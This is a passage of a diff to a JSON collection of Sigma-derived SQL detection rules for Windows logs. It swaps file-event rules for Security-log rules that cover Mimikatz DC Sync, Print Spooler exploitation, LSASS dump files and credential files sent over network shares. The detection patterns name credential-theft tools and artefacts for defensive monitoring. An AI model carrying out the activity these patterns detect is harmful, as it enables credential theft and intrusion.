* FROM logs WHERE ((TargetFilename LIKE '%\\\\Notepad++\\\\plugins\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\Notepad++\\\\updater\\\\gup.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\target.exe' ESCAPE '\\' OR NewProcessName LIKE '%Installer.x64.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4776' AND Workstation = 'RULER') OR (EventID IN ('4624', '4625') AND WorkstationName = 'RULER')))" ], - "filename": "file_event_win_notepad_plus_plus_persistence.yml" + "filename": "win_security_alert_ruler.yml" }, { - "title": "PSEXEC Remote Execution File Artefact", - "id": "304afd73-55a5-4bb9-8c21-0b1fc84ea9e4", + "title": "CVE-2021-1675 Print Spooler Exploitation IPC Access", + "id": "8fe1c584-ee61-444b-be21-e9054b229694", "status": "experimental", - "description": "Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. 
It gets written to the file system and will be recorded in the USN Journal on the target system", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527", + "author": "INIT_6", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", "attack.execution", - "attack.persistence", - "attack.t1136.002", - "attack.t1543.003", - "attack.t1570", - "attack.s0029" + "attack.t1569", + "cve.2021.1675", + "cve.2021.34527" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\PSEXEC-%' ESCAPE '\\' AND TargetFilename LIKE '%.key' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss' AND AccessMask = '0x3' AND ObjectType = 'File')" ], - "filename": "file_event_win_psexec_service_key.yml" + "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml" }, { - "title": "Suspicious VHD Image Download From Browser", - "id": "8468111a-ef07-4654-903b-b863a80bbc95", + "title": "Disabling Windows Event Auditing", + "id": "69aeb277-f15f-4d2d-b32a-55e883609563", "status": "test", - "description": "Malware can use mountable Virtual Hard Disk .vhd file to encapsulate payloads and evade security controls", - "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object Processing\" via 
GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.\n", + "author": "@neu5ron", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Legitimate user creation" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\') AND TargetFilename LIKE '%.vhd%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4719' AND (AuditPolicyChanges LIKE '%\\%\\%8448%' ESCAPE '\\' OR AuditPolicyChanges LIKE '%\\%\\%8450%' ESCAPE '\\'))" ], - "filename": "file_event_win_mal_vhd_download.yml" + "filename": "win_security_disable_event_logging.yml" }, { - "title": "PCRE.NET Package Temp Files", - "id": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", + "title": "RottenPotato Like Attack Pattern", + "id": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", "status": "test", - "description": "Detects processes creating temp files related to PCRE.NET package", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", + "author": "@SBousseaden, Florian Roth", "tags": [ - 
"attack.execution", - "attack.t1059" + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1557.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND TargetUserName = 'ANONYMOUS LOGON' AND WorkstationName = '-' AND IpAddress IN ('127.0.0.1', '::1'))" ], - "filename": "file_event_win_pcre_net_temp_file.yml" + "filename": "win_security_susp_rottenpotato.yml" }, { - "title": "Moriya Rootkit", - "id": "a1507d71-0b60-44f6-b17c-bf53220fdd88", - "status": "test", - "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", - "author": "Bhabesh Raj", - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" - ], + "title": "Add or Remove Computer from DC", + "id": "20d96d95-5a20-4cf1-a483-f3bda8a7c037", + "status": "experimental", + "description": "Detects the creation or removal of a computer. 
Can be used to detect attacks such as DCShadow via the creation of a new SPN.", + "author": "frack113", "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\drivers\\\\MoriyaStreamWatchmen.sys' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4741', '4743'))" ], - "filename": "file_event_win_moriya_rootkit.yml" + "filename": "win_security_add_remove_computer.yml" }, { - "title": "Drop Binaries Into Spool Drivers Color Folder", - "id": "ce7066a6-508a-42d3-995b-2952c65dc2ce", + "title": "Mimikatz DC Sync", + "id": "611eab06-a145-4dfa-a295-3ccc5c20f59a", "status": "experimental", - "description": "Detects the creation of suspcious binary files inside the \"\\windows\\system32\\spool\\drivers\\color\\\" as seen in the blog referenced below", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Mimikatz DC sync security events", + "author": "Benjamin Delpy, Florian Roth (Nextron Systems), Scott Dermott, Sorina Ionescu", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.s0002", + "attack.t1003.006" ], "falsepositives": [ - "Unknown" + "Valid DC Sync that is not covered by the filters; please report", + "Local Domain Admin account used for Azure AD Connect" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND (Properties LIKE '%Replicating Directory Changes All%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE 
'%9923a32a-3607-11d2-b9be-0000f87a36b2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\') AND AccessMask = '0x100') AND NOT ((SubjectDomainName = 'Window Manager') OR ((SubjectUserName LIKE 'NT AUT%' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\')) OR (SubjectUserName LIKE '%$' ESCAPE '\\')))" ], - "filename": "file_event_win_susp_spool_drivers_color_drop.yml" + "filename": "win_security_dcsync.yml" }, { - "title": "Publisher Attachment File Dropped In Suspicious Location", - "id": "3d2a2d59-929c-4b78-8c1a-145dfe9e07b1", - "status": "experimental", - "description": "Detects creation of files with the \".pub\" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote PowerShell Sessions Network Connections (WinRM)", + "id": "13acf386-b8c6-4fe0-9a6e-c4756b974698", + "status": "test", + "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of \".pub\" files from those locations" + "Legitimate use of remote PowerShell execution" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.pub' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5156' AND DestPort IN ('5985', '5986') AND LayerRTID = '44')" ], - "filename": "file_event_win_office_publisher_files_in_susp_locations.yml" + "filename": 
"win_security_remote_powershell_session.yml" }, { - "title": "ScreenConnect Temporary Installation Artefact", - "id": "fec96f39-988b-4586-b746-b93d59fd1922", + "title": "Access to ADMIN$ Share", + "id": "098d7118-55bc-4912-a836-dc6483a8d150", "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "description": "Detects access to $ADMIN share", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Legitimate use" + "Legitimate administrative activity" + ], + "level": "low", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5140' AND ShareName = 'Admin$') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + ], + "filename": "win_security_admin_share_access.yml" + }, + { + "title": "Defrag Deactivation - Security", + "id": "c5a178bf-9cfb-4340-b584-e4df39b6a3e7", + "status": "test", + "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", + "author": "Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)", + "tags": [ + "attack.persistence", + "attack.t1053", + "attack.s0111" + ], + "falsepositives": [ + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\Bin\\\\ScreenConnect.%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 
'Security' AND EventID = '4701' AND TaskName LIKE '\\\\Microsoft\\\\Windows\\\\Defrag\\\\ScheduledDefrag' ESCAPE '\\')" ], - "filename": "file_event_win_screenconnect_artefact.yml" + "filename": "win_security_apt_slingshot.yml" }, { - "title": "LSASS Process Memory Dump Files", - "id": "a5a2d357-1ab8-4675-a967-ef9990a59391", + "title": "Invoke-Obfuscation STDIN+ Launcher - Security", + "id": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", "status": "experimental", - "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\lsass.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.rar' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Temp\\\\dumpert.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Andrew.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Coredump.dmp' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass\\_2%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdmp%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\') OR (TargetFilename LIKE '%SQLDmpr%' ESCAPE '\\' AND TargetFilename LIKE '%.mdmp' ESCAPE '\\') OR (TargetFilename LIKE 'nanodump%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\' AND (ServiceFileName LIKE 
'%${input}%' ESCAPE '\\' OR ServiceFileName LIKE '%noexit%' ESCAPE '\\') AND (ServiceFileName LIKE '% /c %' ESCAPE '\\' OR ServiceFileName LIKE '% /r %' ESCAPE '\\'))" ], - "filename": "file_event_win_lsass_dump.yml" + "filename": "win_security_invoke_obfuscation_stdin_services_security.yml" }, { - "title": "Potential Initial Access via DLL Search Order Hijacking", - "id": "dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c", + "title": "Suspicious Teams Application Related ObjectAcess Event", + "id": "25cde13e-8e20-4c29-b949-4e795b76f16f", "status": "experimental", - "description": "Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.", - "author": "Tim Rauch (rule), Elastic (idea)", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.t1566", - "attack.t1566.001", - "attack.initial_access", - "attack.t1574", - "attack.t1574.001", - "attack.defense_evasion" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSPUB.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fltldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' 
ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft OneDrive\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\api-ms-win-core-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND (ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\')) AND NOT (ProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" ], - "filename": "file_event_win_initial_access_dll_search_order_hijacking.yml" + "filename": "win_security_teams_suspicious_objectaccess.yml" }, { - "title": "Suspicious desktop.ini Action", - "id": "81315b50-6b60-4d8f-9928-3466e1022515", + "title": "ADCS Certificate Template Configuration Vulnerability with Risky EKU", + "id": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", "status": "test", - "description": "Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. 
renaming files) without changing them on disk.", - "author": "Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)", + "description": "Detects certificate creation with template allowing risk permission subject and risky EKU", + "author": "Orlinum , BlueDefenZer", "tags": [ - "attack.persistence", - "attack.t1547.009" + "attack.privilege_escalation", + "attack.credential_access" ], "falsepositives": [ - "Operations performed through Windows SCCM or equivalent", - "Read only access list authority" + "Administrator activity", + "Proxy SSL certificate with subject modification", + "Smart card enrollement" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\desktop.ini' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\JetBrains\\\\Toolbox\\\\bin\\\\7z.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\JetBrains\\\\apps\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4898' AND (TemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR TemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND TemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\') OR (EventID = '4899' AND (NewTemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND NewTemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\')))" ], - "filename": "file_event_win_susp_desktop_ini.yml" + "filename": 
"win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" }, { - "title": "Cred Dump Tools Dropped Files", - "id": "8fbf3271-1ef6-4e94-8210-03c2317947f6", - "status": "test", - "description": "Files with well-known filenames (parts of credential dump software or files produced by them) creation", - "author": "Teymur Kheirkhabarov, oscd.community", - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.003", - "attack.t1003.004", - "attack.t1003.005" - ], + "title": "Password Protected ZIP File Opened (Suspicious Filenames)", + "id": "54f0434b-726f-48a1-b2aa-067df14516e4", + "status": "experimental", + "description": "Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate Administrator using tool for password recovery" + "Legitimate used of encrypted ZIP files" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\pwdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\kirbi%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwhashes%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_ccache%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_krbtkts%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgdump-log%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\test.pwd' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora64.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wceaux.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SECURITY.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SYSTEM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NTDS.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpExt.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpSvc.exe' ESCAPE '\\' OR 
TargetFilename LIKE '%\\\\cachedump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pstgdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Dumpy.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND (TargetName LIKE '%invoice%' ESCAPE '\\' OR TargetName LIKE '%new order%' ESCAPE '\\' OR TargetName LIKE '%rechnung%' ESCAPE '\\' OR TargetName LIKE '%factura%' ESCAPE '\\' OR TargetName LIKE '%delivery%' ESCAPE '\\' OR TargetName LIKE '%purchase%' ESCAPE '\\' OR TargetName LIKE '%order%' ESCAPE '\\' OR TargetName LIKE '%payment%' ESCAPE '\\'))" ], - "filename": "file_event_win_cred_dump_tools_dropped_files.yml" + "filename": "win_security_susp_opened_encrypted_zip_filename.yml" }, { - "title": "CVE-2021-26858 Exchange Exploitation", - "id": "b06335b3-55ac-4b41-937e-16b7f5d57dfd", + "title": "Transferring Files with Credential Data via Network Shares", + "id": "910ab938-668b-401b-b08c-b596e80fdca5", "status": "test", - "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for \ncreation of non-standard files on disk by Exchange Server’s Unified Messaging service\nwhich could indicate dropping web shells or other malicious content\n", - "author": "Bhabesh Raj", + "description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.t1203", - "attack.execution", - "cve.2021.26858" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.001", + "attack.t1003.003" ], "falsepositives": [ - 
"Unknown" + "Transferring sensitive files for legitimate administration work by legitimate administrator" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%CacheCleanup.bin' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.LOG' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%cleanup.bin' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND (RelativeTargetName LIKE '%\\\\mimidrv%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\lsass%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\windows\\\\minidump\\\\%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\hiberfil%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\sqldmpr%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\sam%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\ntds.dit%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\security%' ESCAPE '\\'))" ], - "filename": "file_event_win_cve_2021_26858_msexchange.yml" + "filename": "win_security_transf_files_with_cred_data_via_network_shares.yml" }, { - "title": "Creation of a Diagcab", - "id": "3d0ed417-3d94-4963-a562-4a92c940656a", + "title": "Password Protected ZIP File Opened", + "id": "00ba9da1-b510-4f6b-b258-8d338836180f", "status": "experimental", - "description": "Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)", - "author": "frack113", - "tags": [ - "attack.resource_development" - ], + "description": "Detects the extraction of password protected ZIP archives. 
See the filename variable for more details on which file has been opened.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate microsoft diagcab" + "Legitimate used of encrypted ZIP files" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%.diagcab' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\') AND NOT (TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_diagcab.yml" + "filename": "win_security_susp_opened_encrypted_zip.yml" }, { - "title": "BloodHound Collection Files", - "id": "02773bed-83bf-469f-b7ff-e676e7d78bab", - "status": "experimental", - "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", - "author": "C.J. May", + "title": "Suspicious Windows ANONYMOUS LOGON Local Account Created", + "id": "1bbf25b9-8038-4154-a50b-118f2a32be27", + "status": "test", + "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. 
Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", + "author": "James Pemberton / @4A616D6573", "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.001", - "attack.t1069.002", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1136.001", + "attack.t1136.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((TargetFilename LIKE '%\\_BloodHound.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\_computers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_containers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_domains.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_gpos.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_groups.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_ous.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_users.json' ESCAPE '\\') OR (TargetFilename LIKE '%BloodHound%' ESCAPE '\\' AND TargetFilename LIKE '%.zip%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\pocket\\_containers.json' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND SamAccountName LIKE '%ANONYMOUS%' ESCAPE '\\' AND SamAccountName LIKE '%LOGON%' ESCAPE '\\')" ], - "filename": "file_event_win_bloodhound_collection.yml" + "filename": "win_security_susp_local_anon_logon_created.yml" }, { - "title": "Octopus Scanner Malware", - "id": "805c55d9-31e6-4846-9878-c34c75054fe9", + "title": "Suspicious Access to Sensitive File Extensions", + "id": "91c945bc-2ad1-4799-a591-4d00198a1215", "status": "test", - "description": "Detects Octopus Scanner Malware.", - "author": "NVISO", + "description": "Detects known sensitive file extensions accessed on a network share", + "author": "Samir Bousseaden", "tags": [ - "attack.t1195", - "attack.t1195.001" + 
